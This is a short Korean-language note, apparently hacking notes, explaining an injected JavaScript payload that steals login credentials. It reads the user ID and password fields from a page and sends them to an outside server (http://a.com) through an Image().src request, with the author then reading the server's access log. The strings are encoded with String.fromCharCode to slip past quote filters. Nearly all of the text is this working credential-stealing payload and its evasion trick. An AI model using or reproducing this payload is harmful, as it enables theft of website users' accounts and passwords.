원리는 다음과 같다.
1. document.getElementById('uid').value로 아이디, 패스워드를 가져온다.
2. 변수에 넣고 내 서버로 날리면 끝.
3. location.href같은거 쓰면 페이지 이동이 되니까, 그냥 Image().src='http://server/id/pw';
이렇게 해주고 서버에 access.log를 본다. (아니면 파라미터 넘겨도 되고)
4. 쿼터가 막혀있을 수 있으니 String.fromCharCode()를 써서 아스키화 한다.
id=document.getElementById(String.fromCharCode(117,105,100)).value;
pw=document.getElementById(String.fromCharCode(117,112,119)).value;
Image().src=String.fromCharCode(104,116,116,112,58,47,47,97,46,99,111,109,47).concat(id).concat(String.fromCharCode(47)).concat(pw);
// request to http://a.com/id/pw